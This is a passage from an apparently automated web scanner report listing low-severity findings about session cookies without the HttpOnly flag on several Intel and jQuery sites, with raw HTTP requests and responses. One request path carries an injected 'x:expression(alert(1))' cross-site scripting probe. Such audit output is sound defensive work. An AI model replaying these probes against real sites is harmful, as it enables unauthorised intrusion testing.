Set-Cookie: jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323031363b; Expires=Mon, 07-Mar-2011 23:11:11 GMT; Path=/
X-JAL: 613
Content-Language: en-US
CacheHit: D=624946 t=1296947469127528
X-JSL: D=624952 t=1296947469127528
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.21. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: newsroom.intel.com

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 01:56:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=0F9AA48CBC22DD7A7D0A421E6737E14C.node7IPR; Domain=.intel.com; Path=/
Set-Cookie: jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; Version=1; Path=/
X-JAL: 17
Content-Language: en-US
CacheHit: D=26624 t=1296957380484009
X-JSL: D=26628 t=1296957380484009
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.22. http://newsroom.intel.com/render-widget!execute.jspa  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /render-widget!execute.jspa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /render-widget!execute.jspa HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Origin: http://newsroom.intel.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947574107; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_sq=intelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA
Content-Length: 65

frameID=15023&size=1&widgetType=3&container=2016&containerType=14

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=6A2D969FD2F865ED814073478F5CD886.node6IPR; Domain=.intel.com; Path=/
X-JAL: 435
Content-Language: en-US
CacheHit: D=437180 t=1296956932677160
X-JSL: D=437186 t=1296956932677160
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close


<div class="content-large"></div>
<div class="content-small">

<ul class="jive-sidebar-rssfeed">
<li>
<span>Feb 2, 2011</span>

...[SNIP]...

12.23. http://newsroom.intel.com/theme/white/styles/theme.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /theme/white/styles/theme.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /theme/white/styles/theme.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=7359014C358600335C62FA09C3BE0B68.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=130334 t=1296956932271743
X-JSL: D=130341 t=1296956932271743
Content-Type: text/css
Connection: keep-alive
Content-Length: 2317


/* main default header */
#jive-global-header {
background: #dedede url(../images/jive-hdr-bg1.png) repeat-x top;
border-bottom: 1px #e9e9e9 solid;
}
#jive-global-header-texture {
bac
...[SNIP]...

12.24. http://onsite2.researchintel.com/engine/icorescript.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://onsite2.researchintel.com
Path:   /engine/icorescript.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /engine/icorescript.asp?s=15&sid=&c=&geo=0&f=NONE HTTP/1.1
Host: onsite2.researchintel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:12:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
cache-control: private
pragma: no-cache
Content-Length: 187
Content-Type: text/html
Expires: Thu, 03 Feb 2011 23:12:18 GMT
Set-Cookie: ASPSESSIONIDCSTRSASQ=DJKDPHKCHBEKBKLBIMAIHJGD; path=/
Cache-control: No-Store

clearTimeout(onsTimerB);function ONS_CoreSite(){ONS_sCookie(cn,'sid=9968985447329M1296947538033&stage=13',3,ch);ONS_showInvite();}onsUSID='9968985447329M1296947538033';ONS_initCore(true);

12.25. http://plugins.jquery.com/project/SimpleModal  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://plugins.jquery.com
Path:   /project/SimpleModal

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /project/SimpleModal HTTP/1.1
Host: plugins.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:21:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: SESSabdcf03bfc020aa07e9f024d8c52c72f=tcttbhd60i0t3is8770gbmmcb0; expires=Tue, 01 Mar 2011 02:54:53 GMT; path=/; domain=.plugins.jquery.com
Last-Modified: Sat, 05 Feb 2011 23:21:32 GMT
ETag: "a21bd565ad8681eec5d18d0535ad0a09"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-
...[SNIP]...

12.26. https://secure-newsroom.intel.com/cs_login  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure-newsroom.intel.com
Path:   /cs_login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cs_login HTTP/1.1
Host: secure-newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 05 Feb 2011 23:16:35 GMT
Server: Apache
Set-Cookie: JSESSIONID=A4CC37F1E2D36D9C40FE66EF20991E8D.node7IPR; Domain=.intel.com; Path=/
Set-Cookie: ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-JAL: 0
Location: https://secure-newsroom.intel.com/login.jspa
Content-Length: 0
CacheHit: D=2495 t=1296947795404257
X-JSL: D=2500 t=1296947795404257
Connection: close
Content-Type: text/plain; charset=UTF-8


12.27. http://software.intel.com/en-us/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
Date: Sat, 05 Feb 2011 23:21:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=80d3b7dbc1c511eec9e30e6313957d55; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 77398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<he
...[SNIP]...

12.28. http://software.intel.com/en-us/articles/intel-cloud-builders-overview/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/articles/intel-cloud-builders-overview/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/articles/intel-cloud-builders-overview/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:22:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=9b9329ab03330eb2995d6e0b7cd5ee03; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 44663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.29. http://software.intel.com/en-us/blogs/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=b4b0122969a1cad358c7d154e5df9808; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 52451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.30. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/01/31/everyone-has-a-dream/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/01/31/everyone-has-a-dream/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=c6f20ace22b45018ab76495ba5248e67; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 42232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.31. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/01/31/everyone-has-a-dream/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/01/31/everyone-has-a-dream/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:58 GMT
Content-Length: 2468
Connection: close
Set-Cookie: PHPSESSID=102cf9ecae8791b0e6286744c176e520; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:58 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.32. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=5835ba1bbad9f78b6863c69132a212a2; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 40585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.33. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:55 GMT
Content-Length: 537
Connection: close
Set-Cookie: PHPSESSID=94087cf7981dbc449a184ad7e31d34d0; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:55 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.34. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=bdd17db69f4af41eb346e39496779504; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 40339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.35. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:52 GMT
Content-Length: 1181
Connection: close
Set-Cookie: PHPSESSID=288fc6a5a0c3418583dcc32f57fcb672; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:52 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.36. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=a4e51d252757c97212e7d2d038ee7a76; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 38246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.37. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:55 GMT
Content-Length: 519
Connection: close
Set-Cookie: PHPSESSID=43768f37fef278f86fa1efb8d4f61896; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:55 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.38. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
